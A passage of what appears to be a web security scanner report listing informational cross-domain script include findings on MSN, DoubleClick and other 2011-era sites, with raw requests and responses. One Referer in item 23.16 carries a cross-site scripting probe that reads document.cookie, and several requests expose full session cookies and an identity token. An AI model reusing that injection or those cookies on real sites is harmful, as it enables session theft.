23.9. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.383

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:24:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

23.10. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:49:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6443

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Dec 17 12:45:48 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

23.11. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:54:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6573

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Dec 17 12:41:00 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

23.12. http://alex-johnson.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alex-johnson.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: alex-johnson.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=966b66f7de9fa4522d803727a0791211; expires=Sat, 25-Jan-2031 17:50:07 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.13. http://analytics.live.com/Sync.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.live.com
Path:   /Sync.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Sync.html?V=3525&AQNT=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: analytics.live.com
If-Modified-Since: Mon, 08 Jun 2009 11:01:13 GMT
If-None-Match: "eff9f76f28e8c91:a04"
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; wlidperf=throughput=5&latency=610

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:5c8"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:36 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
...[SNIP]...

23.14. http://analytics.microsoft.com/Sync.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.microsoft.com
Path:   /Sync.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Sync.html HTTP/1.1
Host: analytics.microsoft.com
Proxy-Connection: keep-alive
Referer: http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:a15"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:50:53 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

23.15. http://analytics.redacted/Include.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.redacted
Path:   /Include.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Include.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://analytics.live.com/Sync.html?V=3525&AQNT=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: analytics.redacted
If-Modified-Since: Mon, 08 Jun 2009 11:01:13 GMT
If-None-Match: "eff9f76f28e8c91:5d1"
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 464
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:823"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:39 GMT
Content-Length: 464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

23.16. http://analytics.redacted/sync.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.redacted
Path:   /sync.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sync.html HTTP/1.1
Host: analytics.redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:9ed"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 13:00:12 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

23.17. http://assets.tumblr.com/iframe.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets.tumblr.com
Path:   /iframe.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe.html?8&src=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual&pid=3007820135&rk=GHuYv0bI&lang=en_US&name=informationarbitrage HTTP/1.1
Host: assets.tumblr.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 14:47:56 GMT
ETag: "e0002-e18-49039beb65a80+gzip"
Last-Modified: Tue, 14 Sep 2010 15:19:54 GMT
Server: ECS (dca/532D)
Vary: Accept-Encoding
X-Cache: HIT
X-Tumblr-Usec: D=446
Content-Length: 3608

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   
    <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

23.18. http://astrocenter.astrology.redacted/msn/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://astrocenter.astrology.redacted
Path:   /msn/Default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/Default.aspx HTTP/1.1
Host: astrocenter.astrology.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:45:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fre
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.astrocenter.com/us/js/center-horoscope.js"></script>
...[SNIP]...
<!-- Vibrant/Bing -->
<script type="text/javascript" src="http://astrocenter.msn.us.intellitxt.com/ast/js/msn/astrocenter.msn_cs.js"></script>
...[SNIP]...

23.19. http://athima-chansanchai.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://athima-chansanchai.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: athima-chansanchai.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=537268251bbeeeeb3942d69bd368a709; expires=Sat, 25-Jan-2031 17:50:18 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.20. http://autos.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Server: BL2CARWB06
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2003.09.02T11:37-0700" exp "2004.09.02T12:00-0700" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 44236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<met
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/core.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/2/report.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/mktplaces/js/core.2010.02.22.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/om/js/s_code.js"></script>
...[SNIP]...
</div><script type='text/javascript' src='http://blu.stj.s-msn.com/br/om/js/lt/lt.js'></script>
...[SNIP]...

23.21. http://autos.redacted/research/compare/compare.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autos.redacted
Path:   /research/compare/compare.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /research/compare/compare.aspx HTTP/1.1
Host: autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Server: BL2CARWB03
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2003.09.02T11:37-0700" exp "2004.09.02T12:00-0700" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 48546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/core.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/2/report.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/mktplaces/js/core.2010.02.22.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/om/js/s_code.js"></script>
...[SNIP]...
</div><script type='text/javascript' src='http://blu.stj.s-msn.com/br/om/js/lt/lt.js'></script>
...[SNIP]...

23.22. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; session=1296350849|1296350849; dlx_XXX=set; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2670
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/103723
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1037239110/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1037239110?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

23.23. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
